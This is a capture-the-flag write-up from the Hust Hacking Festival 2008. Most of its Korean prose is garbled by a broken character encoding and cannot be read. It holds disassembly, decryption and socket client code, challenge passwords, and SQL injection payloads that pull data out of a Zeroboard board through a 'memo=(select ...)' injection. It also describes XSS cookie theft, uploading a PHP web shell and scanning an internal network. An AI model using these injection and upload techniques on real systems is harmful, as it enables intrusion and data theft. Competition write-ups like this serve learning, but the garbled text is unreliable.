=====================================
< Hust Hacking Festival 2008 Report >



by hkpco()
-------------------------------------
mail     - hkpco@korea.com
homepage - http://hkpco.kr/
group    - wowhacker team
=====================================
ȸ  ̵ - newheart
-------------------------------------


"I am so sorry!"

ȸ ڴ  Ի ϰ ߰߰ ũ  ð Ǿ  ȸ Ⱓ  ʹ   ſ
  ۿ  ߽ϴ. ٳ    Ͽ 캸ٰ ߰ ۽ ̷ ڴ  ϰ
 п α      ϴ. ȸ      Ź帳ϴ.



Part A - 1

Ư    д Դϴ.    ϸ level 1 ~ 5  ư ֽϴ.
level1 Ǿ н尡     ִµ,   level5 Ǿֱ  ̸ ؾ մϴ.
level2     level1   ٲ  ֵ Ǿ ֱ  ٸ  մϴ.
Ϲ Խ ̱淡 XSS  Ű Ȥ  ų, CSRF  Ͽ Ư    õϵ
  ó   ʾҽϴ. پ          üũ ڵ带 
  ־ϴ.

--
if( $level < 2 ) {
	echo " ";
}

else {
	echo " ";
}
--


, ǹ ߸   level 1 ƴϾ         Դϴ.
    Ͻø Ͽ   1 Ϸ    Ͽ н带 ȹ  ־ϴ.





Part A - 2

ؽƮ   ȣȭ ִ  ̳ʸ ̸  ȣȭ  н  ־ϴ.
Ư   ָ ȣȭ    Ͽ ȣ  ݴϴ.
ش ȣȭ ƾ WriteFile() API  Ͽ ã  ־ϴ.  ϴ(ּ ߰).

--
.text:004014B9                 mov     ecx, ebp        ; ecx = file size
.text:004014BB                 sub     edx, ebp
.text:004014BD                 mov     edi, esi        ; edi = filesize
.text:004014BF
.text:004014BF loc_4014BF:                             ; CODE XREF: .text:004014D9j
.text:004014BF                 mov     al, [edx+ecx]   ; al = edx+ecx
.text:004014BF                                         ; ecx -> cnt
.text:004014BF                                         ; edx -> plain text
.text:004014BF                                         ;
.text:004014C2                 xor     al, bl          ; al = al ^ bl
.text:004014C4                 mov     [ecx], al       ; [ecx] = al;
.text:004014C6                 and     eax, 0FFh       ; eax = eax & 0xff
.text:004014CB                 shr     ebx, 8          ; ebx = ebx >> 8
.text:004014CE                 mov     eax, dword_4190B0[eax*4] ; eax = 4190b0[eax*4]
.text:004014D5                 xor     ebx, eax        ; ebx = ebx ^ eax
.text:004014D7                 inc     ecx             ; ecx++
.text:004014D8                 dec     edi             ; edi--
.text:004014D9                 jnz     short loc_4014BF ; al = edx+ecx
.text:004014D9                                         ; ecx -> cnt
.text:004014D9                                         ; edx -> plain text
--


xor ϴ°    Ű ̺  ּҿ ˴ϴ.

--
004190B0  00 00 00 00 96 30 07 77 2C 61 0E EE BA 51 09 99  ....?w,aQ.
.
.
.
--


ȣ ƾ C Ÿ  ϴ.

--
#define MAX 4096

int main( void )
{
	int cnt;
	char ch;
	char str[MAX];
	char x_table[] =
        { 0x00, 0x00, 0x00, 0x00, 0x96, 0x30, 0x07, 0x77 ..
	...
	...
	...
	};

	unsigned long ebx = 0xA9D4FB79;

	for( cnt = 0 ; cnt < MAX ; cnt++ )
	{
		ch = str[cnt];

		ch = ch ^ (ebx&0xff);
		printf( "%c", ch );
		fflush(stdout);

		ebx = ebx >> 8;
		ch = x_table[ch*4];
		ebx = ebx ^ ch;
	}

	return 0;
}
--


xor     ϰ Ǹ   ƿ Ư¡ ֽϴ. ׷ ȣȭ ƾ Ͽ  ȣȭ
ƾ ۼ ʿ䰡 ϴ.  ־  ȣȭ Ͽ   н带   ֽϴ.

--
[hkpco@hkpco HUST]$ ./hk_dec < password.txt
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&

           : 38d9587b9be0bd19be5dcb109f023504

!@%!@!@#^*!@#^(!@^(!@)^!@^!@^(!^$%($^#$^%(%#^(%#(^^#(@%#(^@%^
$(_(*^%$$%*()($#$%^&*()&^%$#$%^&*)(*&^%$%^&*((*&%$#$%^&*()(**
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
--





part A - 3

sQuest.jar ̶  ־ ڹٷ ۼ   ҽϴ. ִ  Ǯ ڹ Ϸ ̿Ͽ
ڵ带 캸  Client.class Ͽ       ־ϴ.

--
.
.
    public Client()
    {
        Socket socket1;
        socket1 = null;
        try
        {
            socket1 = new Socket("220.95.152.32", 9000);
            DataInputStream datainputstream = new DataInputStream(socket1.getInputStream());
            DataOutputStream dataoutputstream = new DataOutputStream(socket1.getOutputStream());
            BufferedReader bufferedreader = new BufferedReader(new InputStreamReader(System.in));
            (new ListenThread(datainputstream)).start();
            System.out.println("ready!!");
            do
            {
                String s = bufferedreader.readLine();
                if(s.equalsIgnoreCase("quit"))
                    System.exit(0);
.
.
.
--


 ּҴ 220.95.152.32 ̸ Ʈ 9000 ̾ϴ.  Ͽ ڿ  Ư Ģ ڵ Ǿµ
 ۾̱     ڿ εǴ ڸ ã ϴ.

--
A -> C
B -> E
C -> H
D -> L
E -> K
.
.
V -> G
W -> B
X -> O
Y -> S
Z -> V
--


 ϸ ڵ  ڿ Ǵ ұĢ 7bytes Ʈ  ִµ,
̿   ٽ ϸ     ϰ    ڵ Ͽϴ.

--
/*
	hkpco
	ChanAm Park
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>

int sock_conn( char **argv );
int err( char *msg );

int main( int argc , char **argv )
{
	int sockfd;
	char buffer[1024] = {0x00,};
	char *p = buffer;
	char table[] =
{'C','E','H','L','K','M','A','Y','T','D','X','R','Z',
'U','I','Q','N','P','J','F','W','G','B','O','S','V'};

	char key[16] = {0x00,};

	int cnt, cnt_in;

	if( argc < 3 ) {
		fprintf( stderr, "%s [server] [port]\n", argv[0] );
		return -1;
	}

	sockfd = sock_conn( argv );
	memset( buffer, 0x0, sizeof(buffer) );
	read( sockfd, buffer, sizeof(buffer) );
	printf( "%s\n", buffer );
	printf( "%s\n", p+7 );

	for( cnt = 0 ; cnt < 7 ; cnt++ )
	{
		for( cnt_in = 0 ; cnt_in < sizeof(table) ; cnt_in++ )
		{
			if( *(p+7+cnt) == table[cnt_in] ) {
				printf( "%c\n", 'A'+cnt_in );
				key[cnt] = 'A'+cnt_in;
			}
		}
	}
	printf( "key: %s\n", key );

	write( sockfd, key, strlen(key) );
	memset( buffer, 0x0, sizeof(buffer) );

	read( sockfd, buffer, sizeof(buffer) );
	printf( "last rcv: %s\n", buffer );

	close(sockfd);
	return 0;
}

int sock_conn( char **argv )
{
	int sockfd;
	struct sockaddr_in sock;
	struct hostent *host_st;

	sockfd = socket( PF_INET, SOCK_STREAM, 0 );
	if( sockfd < 0 )
		err( "socket()" );

	host_st = gethostbyname( argv[1] );
	if( host_st == NULL )
		err( "gethostbyname()" );

	bzero( sock.sin_zero, sizeof(sock.sin_zero) );
	sock.sin_family = AF_INET;
	sock.sin_port = htons(atoi(argv[2]));
	sock.sin_addr = *((struct in_addr *)host_st->h_addr);

	if( connect( sockfd, (struct sockaddr *)&sock, sizeof(sock) ) < 0 )
		err( "connect()" );

	return sockfd;
}

int err( char *msg )
{
	perror(msg);
	exit(-1);
}
--


  NEXT : solution ̶ ޽ ޹  ־      н尡 Ǿϴ.





Part A - 4

Ajax ڵ   ü  ־ϴ. ׷  Ͻ÷ Ȯ   ü ư ŬϿ ü ж
â    submit ̷ ʴ    ־ϴ.   ҽ ڵ带  JScript.Encode Ǿ
ֱ   ҽ ڵ带   µ, ̴ پ ̳ 󿡼 ϴ ڵ 񽺸 ̿ϸ  ȣȭ
  ֽϴ.  ü  submit ڵ  ϴ.

--
<FORM METHOD=POST ACTION="makgurlri.php" NAME="fInput">
<TR height="30">
<TD width="150">&nbsp;</TD>
<TD>&nbsp;</TD>
</TR>
.
.
<TR height="30">
<TD colspan="2" align="center"><INPUT TYPE="submit" VALUE="         " onClick="fcInputBtn();"></TD>
</TR>
</FORM>
--


ư Ŭϸ fcInputBtn(); ȣǸ ش ڵ  ϴ.

--
function fcInputBtn()
{
	document.fInput.action = 'chivasRegal.html';
	window.alert('ü !');
}
--


 makgurlri.php chivasRegal.html action ٲپ ִ°     form action  chivasRegal.html
Ͽ submitǵ Ͽϴ. ð  ɸ   н  ־ ª ð ٲ
ó   ִ       ڵ带 ۼϿ, ᱹ ̷ ۾ ʿ ʴٴ
 ˰ԵǾϴ. Ŷ ĸ  н带 ִ  ԵǾ ־ ڿ Է ޴ 
н OPT  ƹ  ° ϴ. н "By doubting we come at the truth" Դϴ.





Part B - 1

, , , иʸ ǥ ִ Ÿ̸Ӱ    ϴ  ̳ʸ ־ϴ.
ollydbg 캻   ð      ƽϴ(ollydbg  ڵ).

--
.
.
0040163E   > \BF 3C000000   mov edi, 3C                              ;  Default case of switch 004015EA
00401643   >  8B4E 70       mov ecx, dword ptr ds:[esi+70]
00401646   .  B8 74000000   mov eax, 74
0040164B   .  3BC8          cmp ecx, eax
0040164D   .  75 1D         jnz short timer.0040166C
0040164F   .  837E 74 70    cmp dword ptr ds:[esi+74], 70
00401653   .  75 17         jnz short timer.0040166C
00401655   .  837E 78 72    cmp dword ptr ds:[esi+78], 72
00401659   .  75 11         jnz short timer.0040166C
0040165B   .  3946 6C       cmp dword ptr ds:[esi+6C], eax
0040165E   .  75 0C         jnz short timer.0040166C
00401660   .  53            push ebx
00401661   .  53            push ebx
00401662   .  68 50304000   push timer.00403050                      ;  ASCII "You are around solution"
00401667   .  E8 D2040000   call <jmp.&MFC42.#1200>
.
.
.
--


Ÿ̸ ð   ϸ   ƾ ġ ˴ϴ(ida  ڵ).

--
.text:00401280 sub_401280      proc near               ; DATA XREF: .rdata:004025ACo
.text:00401280
.text:00401280 arg_0           = dword ptr  4
.text:00401280
.text:00401280                 push    esi
.text:00401281                 mov     esi, ecx
.text:00401283                 push    edi
.text:00401284                 mov     edi, [esp+8+arg_0]
.text:00401288                 lea     eax, [esi+6Ch]
.text:0040128B                 push    eax
.text:0040128C                 push    3EDh
.text:00401291                 push    edi
.text:00401292                 call    ?DDX_Text@@YGXPAVCDataExchange@@HAAI@Z ; DDX_Text(CDataExchange *,int,uint &)
.text:00401297                 lea     ecx, [esi+70h]
.text:0040129A                 push    ecx
.text:0040129B                 push    3E8h
.text:004012A0                 push    edi
.text:004012A1                 call    ?DDX_Text@@YGXPAVCDataExchange@@HAAI@Z ; DDX_Text(CDataExchange *,int,uint &)
.text:004012A6                 lea     edx, [esi+74h]
.text:004012A9                 push    edx
.text:004012AA                 push    3EBh
.text:004012AF                 push    edi
.text:004012B0                 call    ?DDX_Text@@YGXPAVCDataExchange@@HAAI@Z ; DDX_Text(CDataExchange *,int,uint &)
.text:004012B5                 lea     eax, [esi+78h]
.text:004012B8                 push    eax
.text:004012B9                 push    3ECh
.
.
.
--


  Ÿ̸ ð DDX_Text ڷ ޵Ǵµ, Լ ȣ  ƴ  ° (Ʈ Ʈ ID) 
ƽŰ ڵ带 ϸ "tprtlgyflsla" ̶ ڿ    ̰ н尡 ˴ϴ.





Part B - 2

Ʈ  ־,     ̹   н带 Ÿ ִ° ϴ.
̴     Ͽ ִ ޸  ׸ ϸ Ǹ  Ͽ  н尡
ª ð   ھ            ڵ
ĥ  Ƿ ̴   δ  ϴ. ӿ ־ ׸      ϴ.

--
02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 02 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00
00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 00 00 00 00
.
.
.
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 02 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02
--


Ű  ھ Ÿ ̸   "BE5tP4SVxA5Lki18"  н带   ֽϴ.





Part B - 3

   ȭ ũ  ָ ̸  н带 ˾Ƴ° Դϴ.
root  н hash  ԵǾ ־,  Ǵ ý   ũ
񽺸 Ͽ ȣȭ   ־ϴ. н, "CAFEamericano!!"





Part B - 4

κ Խ 3 б 2 ϴ  ־ϴ.
б write_ok.php    Ǵ $del_queX  ϸ   
 κ php ڵ  ϴ.

--
@mysql_query("update $t_board"."_$id set headnum='$headnum',prev_no='$prev_no',next_no='$next_no',
child='$child',depth='$depth',arrangenum='$arrangenum',father='$father',name='$name',email='$email',
homepage='$homepage',subject='$subject',memo='$memo',sitelink1='$sitelink1',sitelink2='$sitelink2',
use_html='$use_html',reply_mail='$reply_mail',is_secret='$is_secret',
category='$category' $del_que1 $del_que2 where no='$no'") or error(mysql_error());
--


⼭   κ $del_que1 ̿Ͽ  õϿϴ.
б     ֽϴ.

--
, memo=(select memo from zetyx_board_bOarD_1 where no=Խñ۹ȣ) 
--


  б   "TABLE NAME", "721f214d3c9de37d58a5b38c55e651c7" ̾, ο  õؾ ϴ°
ϴ. ش  ̿Ͽ information_schema db 캻  721f214d3c9de37d58a5b38c55e651c7 ̺ ϴ
database ̸ ˾Ƴ  ־ϴ. 721f214d3c9de37d58a5b38c55e651c7 ̺ ϴ db ̸ bIgBaNG ̸, 
÷ ̸ P, A, SS, W, O, R, D     ֽϴ.  ʵ尪   Ͽϴ.

--
, memo=(select P from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) 
, memo=(select A from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) 
, memo=(select SS from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) 
, memo=(select W from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) 
, memo=(select O from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) 
, memo=(select R from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) 
, memo=(select D from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) 
--


̷   ڿ ϸ "m@ket0d4yth3b3Std@y0fy0Url!F3" н带   ֽϴ.





Part C - 1

Ʈũ ƴٴϴ Ŷ ĸ  ̴ 16 ڵ ־ϴ.
 κ Ǵ  ڷ Ÿ  ִ  ӵ 16  ̸  ڷ
ȯϸ "PASS qksrkqtmqslek"  ڿ   ֽϴ. н, "qksrkqtmqslek" Դϴ.





Part C - 2

Խ ־  ǥ  "̰  ³??"      Ͽϴ.
Ǯ̴  XSS Ͽ ǰ Ŀ  Ͽ   ð ɷȴ  ˴ϴ.
XSS ༺ ǵ  ڵȭ ۾  ƾ ϴµ ׷ Ѱ    ޱⰡ 
ϴ. ׸ Ϲ ڵ    ־  XSS  document.cookie    Ͽ
  ڼ ־    Ϲ  ǰ  ·  ұ   
 ϴ. Ϲ ڰ Խñ   ΰų   ¸  Ưϰ  ξ
ϴ ƽ  ҽϴ. ƹư, Խñ   XSS ڵ带 ͸    ִ  Ͽ 
   ־ ش   Խñ Ͽ н带 ȹ  ־ϴ.





Part C - 3

Ŷ ĸ  aracode.pcap ־ϴ.
wireshark  캻  FTP  ̷    ־, Ͱ    Ϸ Ͽ
н尡    ΰ   ־ϴ.   Ͽ н尡 ɷ־  ̸ Ǯ
ߴµ, ܼ   δ ˾Ƴ  ϴ. ׷ Advanced ZIP Password Recovery  ̿Ͽ
  ̿     н带 ½ϴ.  Ǯ ؽƮ  ϳ ׸  ϳ
ϴµ, ؽƮ Ͽ  ڸ ׸ Ͽ ִ ƽŰ ڵǥ Ͽ ڸ   "woongkang" ̶
н带   ֽϴ.





Part C - 4

  ۵ Ʈ ־ϴ.
Խ  ε ༺ ̿Ͽ php3  Ȯڷ php  ε  , ε 丮 ؼ  
ȹ  ֽϴ. ߰ Խ db    Ƿ  sql     Ͽϴ.
    ƹ   н õ ͸ ã      ִ 
ǴϿϴ. ifconfig  ̿Ͽ 192.168.200.10   ã  ־  캻   
ȹ   °   ־ϴ. ׷    ipscan  Ե ĳʸ ̿Ͽ
  Ͽ 192.168.200.11   Ѵٴ  ˾Ƴ  ־ϴ.  Ʈ ĵ Դϴ.

--
hkscan -> portscan -> 192.168.200.11

loc-srv [135]
NoName [3389]
--


Windows RPC 񽺷 Ǵ 135 Ʈ,    Ʈ Ǵ 3389 Ʈ ִ  ȮϿϴ.
Ʈ  Ͽ ٸ  Ǯ̶  ̷, Ŀ Ʈ ̷(ߴͰ  ǵ)̶
Ʈ Ǿϴ.  1ð ܵΰ   Ʈ ̷ ϴ  ãٰ Ͽ ssh ͳθ
õϴ ߿ ȸ ϴ.